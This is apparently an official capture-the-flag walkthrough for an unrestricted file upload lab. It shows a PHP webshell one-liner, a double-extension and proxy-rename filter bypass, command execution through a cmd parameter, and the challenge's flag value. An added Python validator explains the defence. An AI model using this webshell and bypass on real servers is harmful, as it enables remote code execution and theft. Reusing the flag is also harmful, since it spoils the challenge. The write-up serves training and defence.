HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Photo Upload — InstaSnap

File Upload Vulnerabilities · Unrestricted File Upload / Webshell
Difficulty: Intermediate
Vuln class: Unrestricted File Upload / Webshell
Steps: 5
// Objective
Upload a PHP webshell disguised as an image to InstaSnap's profile photo feature, then use it to execute commands on the server and retrieve the flag.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1. Test the upload endpoint normally
Log in and navigate to your profile. Upload a legitimate JPEG image to understand the normal flow. Note the URL where the uploaded file ends up — it is usually in a predictable path like /uploads/ or /media/.
Command / Input
Upload: profile.jpg → observe response URL /uploads/abc123/profile.jpg
2. Attempt to upload a PHP file directly
Create a PHP file (shell.php) and try to upload it as-is. The server may reject it based on the extension; if so, you need to bypass the filter.
Command / Input
File: shell.php Content: <?php system($_GET["cmd"]); ?>
Output
Error: Only image files are allowed.
If the server only checks the file extension or MIME type in the HTTP request — not the actual file content — it can be bypassed.
3. Bypass the filter with a double extension
Many filters only check the last extension. Try naming your file with a double extension — the server may treat it as an image while the web server still executes it as PHP.
Command / Input
File: shell.php.jpg Content: <?php system($_GET["cmd"]); ?>
Output
Upload successful. File stored at /uploads/shell.php.jpg
Alternatively, if Burp Suite is available, intercept the upload request and change the filename from shell.jpg to shell.php after the filter has already passed.
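The weaknesses exploited in steps 2 and 3 (a check on the last extension only, and trusting the client filename after the check) are closed by validating every extension component, sniffing the file content, and never reusing the client-supplied name. The validator below is an added defensive example, not code from the challenge or from InstaSnap; the signature table, allowlist and size limit are assumptions.

```python
import os
import secrets

# Allowlisted image types keyed by the magic bytes each file must start with
# (constructed table for this example).
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024

class UploadRejected(ValueError):
    """Raised when an upload fails validation."""

def sniff_image_type(data: bytes) -> "str | None":
    """Identify the image type from content, never from the client-supplied name."""
    for signature, ext in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return ext
    return None

def validate_upload(client_filename: str, data: bytes) -> str:
    """Validate an upload; return the server-chosen name to store it under.
    Every extension component is checked (so shell.php.jpg fails, not only
    shell.php), the bytes are sniffed, and the client name is never reused,
    so renaming it in an intercepting proxy changes nothing on disk."""
    if not data or len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("empty or oversized file")
    # Drop any directory part so path tricks in the name are ignored.
    base = os.path.basename(client_filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("filename has no extension")
    bad = [p for p in parts[1:] if p not in ALLOWED_EXTENSIONS]
    if bad:
        raise UploadRejected(f"disallowed extension component(s): {bad}")
    sniffed = sniff_image_type(data)
    if sniffed is None:
        raise UploadRejected("content is not a recognised image")
    # Random server-side name; the extension comes from the sniffed content.
    # Store it in a directory the web server serves without script execution.
    return f"{secrets.token_hex(16)}.{sniffed}"

def is_accepted(client_filename: str, data: bytes) -> bool:
    try:
        validate_upload(client_filename, data)
        return True
    except UploadRejected:
        return False
```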
4. Execute commands via the webshell
Navigate to the uploaded file URL and append a cmd parameter to run OS commands.
Command / Input
GET /uploads/shell.php.jpg?cmd=id
Output
uid=33(www-data) gid=33(www-data) groups=33(www-data)
You now have remote code execution as the web server user.
5. Read the flag
Use your webshell to cat the flag file from the server filesystem.
Command / Input
GET /uploads/shell.php.jpg?cmd=cat+/flag.txt
Output
HackrGG{f1l3_upl04d_w3bsh3ll_3x3c}
// Flag
Flag value: HackrGG{f1l3_upl04d_w3bsh3ll_3x3c}
Retrieved via remote code execution through the uploaded webshell.